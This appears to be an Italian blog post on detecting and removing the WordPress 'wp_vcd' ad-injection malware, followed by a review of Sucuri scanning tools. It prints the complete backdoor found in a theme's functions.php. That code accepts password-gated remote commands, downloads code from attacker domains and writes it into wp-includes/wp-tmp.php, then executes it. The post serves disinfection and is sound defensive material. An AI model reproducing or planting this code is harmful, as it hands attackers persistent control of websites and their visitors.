Wordpress Malware

Wordpress Malware

"rogueads.unwanted_ads" su WP come rimuoverlo

La mia esperienza mi ha portato a scrivere questo post, per aiutarvi nella prevenzione ed eliminazione di fiale malevoli Malware che potrebbero compromettere il vostro WordPress, sia nel sistema che nel Posizionamento su Google e altri motori di ricerca.

Oggi ne andremo ad analizzare uno in particolare, molto comune in Wordpress “rogueads.unwanted_ads”

Descrizione: Iniezioni malevoli di Varios che comportano la visualizzazione di annunci (o l'apertura di finestre pop-up o pop-under) senza il consenso del proprietario del sito. Tali iniezioni possono utilizzare script di reti pubblicitarie legittime.

Malware

 

Molto facile a individuare appunto della sua presenza, visto che si apriranno pop up o link insueti al sito.
Molto importante e definire il flusso del contagio… in parole povere come ho preso il Malware?
Potrebbero essere molteplici le strade male più comuni sono:

1 Non importare plugin non legalmente acquistati
2 Non importare Template non legalmente acquistati
3 Aggiornare sempre il propio WP e i plugin associati
4 L’imitare l’uso dei plugin (onde evitare che se scritti male potrebbero essere facilmente compromessi)
5 Server sicuro quindi spendere il giusto non certo 1 euro

Ma adiamo al nocciolo del discorso, una volta che siamo in gioco cominceremo a verificare la vera identità tramite uno scanner online molto utile io uso questo: sitecheck.sucuri.net
Una volta individuato il problema… No Panico!


Spesso il Core del Malware va a intaccare il nostro file function.php del tema che stiamo utilizzando.
Ighettando uno script simile:

<?php
if ( isset( $_REQUEST[ 'action' ] ) && isset( $_REQUEST[ 'password' ] ) && ( $_REQUEST[ 'password' ] == '741b457737ff0478b6e1ccef383efcc9' ) ) {
$div_code_name = "wp_vcd";
switch ( $_REQUEST[ 'action' ] ) {
case 'change_domain';
if ( isset( $_REQUEST[ 'newdomain' ] ) ) {
if ( !empty( $_REQUEST[ 'newdomain' ] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain ) ) {
$file = preg_replace( '/' . $matcholddomain[ 1 ][ 0 ] . '/i', $_REQUEST[ 'newdomain' ], $file );
@file_put_contents( __FILE__, $file );
print "true";
}
}
}
}
break;
case 'change_code';
if ( isset( $_REQUEST[ 'newcode' ] ) ) {

if ( !empty( $_REQUEST[ 'newcode' ] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode ) ) {

$file = str_replace( $matcholdcode[ 1 ][ 0 ], stripslashes( $_REQUEST[ 'newcode' ] ), $file );
@file_put_contents( __FILE__, $file );
print "true";
}


}
}
}
break;

default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die( "" );
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if ( !function_exists( 'theme_temp_setup' ) ) {
$path = $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ REQUEST_URI ];
if ( stripos( $_SERVER[ 'REQUEST_URI' ], 'wp-cron.php' ) == false && stripos( $_SERVER[ 'REQUEST_URI' ], 'xmlrpc.php' ) == false ) {

function file_get_contents_tcurl( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_AUTOREFERER, TRUE );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, TRUE );
$data = curl_exec( $ch );
curl_close( $ch );
return $data;
}

function theme_temp_setup( $phpCode ) {
$tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
if ( fwrite( $handle, "<?php\n" . $phpCode ) ) {} else {
$tmpfname = tempnam( './', "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
fwrite( $handle, "<?php\n" . $phpCode );
}
fclose( $handle );
include $tmpfname;
unlink( $tmpfname );
return get_defined_vars();
}


$wp_auth_key = 'bb9aed696b080d6d327d927fc0b733d8';
if ( ( $tmpcontent = @file_get_contents( "http://www.macocs.com/code.php" )OR $tmpcontent = @file_get_contents_tcurl( "http://www.macocs.com/code.php" ) )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
} elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.pw/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
}

elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.top/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
}
elseif ( $tmpcontent = @file_get_contents( ABSPATH . 'wp-includes/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

} elseif ( $tmpcontent = @file_get_contents( get_template_directory() . '/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

} elseif ( $tmpcontent = @file_get_contents( 'wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

}





}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

Se lo script è simile... possiamo procedere...

Come possiamo notare spesso andranno a richiamare altri file generati all’interno del core.
Leggendo il codice possiamo individuare il percorso del file da eliminare.

Spesso si trovano all’interno del core di WP nella cartella wp-includes/

Nel mio caso lo script in questione $div_code_name="wp_vcd"; all’interno del mio file function richimva un altro file all’interno della cartella wp-includes/wp-tmp.php

Quindi cosa fare?

Via FTP andremo nella cartella del mio tema,
e tolgieremo lo script malevolo all’interno del file function.php per poi eliminare il file wp-includes/wp-tmp.php.
Questa volta è stato facile, ma non si deve mai Abbassare la guardia!

Risorse:
sitecheck.sucuri.net
mxtoolbox.com

WordPress per Hidden malware

undefined

Come eseguire la scansione del sito web Wordpress

Come il più popolare sistema di gestione dei contenuti on-line, siti web WordPress sono un obiettivo comune per gli hacker, spammer e altri soggetti malintenzionati.
Ecco perché è fondamentale adottare misure per rendere il vostro sito web più sicuro.
L'obiettivo della maggior parte degli hacker è quello di infettare il sito web con malware. minacce malware più comuni sono:


Pharma Hacks - inietta lo spam nel database sito web o file.

Backdoor - consente agli hacker di avere accesso al tuo sito web in qualsiasi momento, tramite FTP o la vostra area di amministrazione di WordPress.

Drive by Download - quando un hacker utilizza uno script per scaricare un file nel computer degli utenti, sia a loro insaputa o indurre in errore il visitatore e dicendo che il software fa qualcosa di utile.

Di file e database Iniezioni - codice inserisce nei file o database che consente gli hacker fanno un certo numero di cose diverse.

Redirect dannosi - Reindirizza i visitatori a una pagina di loro che induce in errore le persone a scaricare un file infetto.

Phishing - utilizzati per acquisire username, password, indirizzi e-mail e altre informazioni sensibili.

Quando la maggior parte della gente pensa su un sito web viene violato, pensano l'hacker deturpare il sito e mettendo un messaggio per i visitatori ad esempio il sito web è stato violato da gigio!

In realtà, defacement non sono così comuni.
La maggior parte degli hacker non voglio che tu sappia che hanno manomesso il tuo sito web, come la prima cosa che il proprietario di un sito web farà quando sanno che il loro sito è stato compromesso è rimuovere i file maligni in questione.

Gli hacker che infettano il tuo sito web con il malware sono più discreti. Più a lungo si sono a conoscenza del tuo sito web sia infetto, più a lungo possibile utilizzare il sito web per inviare e-mail di spam e infettare i visitatori. Anche un sito web WordPress sicuro può essere violato senza che il proprietario sapere. E 'quindi importante che eseguire la scansione del sito web regolarmente per rilevare eventuali malware nascosto.

In questo articolo, vorrei mostrarvi servizi e soluzioni di plugin che vi aiuteranno a rilevare il malware dannoso sul tuo sito web WordPress.

Sucuri Malware Scanning

Sucuri hanno una grande reputazione come un di sicurezza efficace e soluzione di scansione del malware. La loro Sucuri SiteCheck scanner esegue una scansione del sito web per i problemi più comuni gratuitamente.

Lo scanner esegue una scansione del sito web per le iniezioni di malware, defacement, e di spam. Sarà anche rilevare se il server sito è stato inserito nella lista nera (che può accadere se un hacker ha utilizzato il server per inviare spam). Il limite principale dello scanner è che è necessario eseguire la scansione del sito web manualmente da soli.

Aggiornamento a loro $ 89,99 piano di premio annuo vi darà avvisi automatici via e-mail e Twitter su eventuali problemi di malware. Questo piano sarà anche rimuovere il malware te e rimuoverò il tuo sito web da qualsiasi blacklist.

undefined

Sucuri offrono anche un plugin per WordPress intitolato Sucuri Security . Oltre alla scansione del sito web per il malware, il plugin offre un firewall per rendere il vostro sito più sicuro, le opzioni che affrontano buchi comuni di sicurezza di WordPress indurimento e una sezione "ultimi accessi" che mette in evidenza esattamente chi ha accesso al tuo sito web.

Il plugin ha anche alcune caratteristiche utili per il ripristino del sito web dopo un attacco, come ad esempio l'aggiornamento delle chiavi di sale WordPress e la reimpostazione delle password degli utenti.

CSS winner Andres Hunger
CSSRELL Andres Hunger
BESTcss Andres Hunger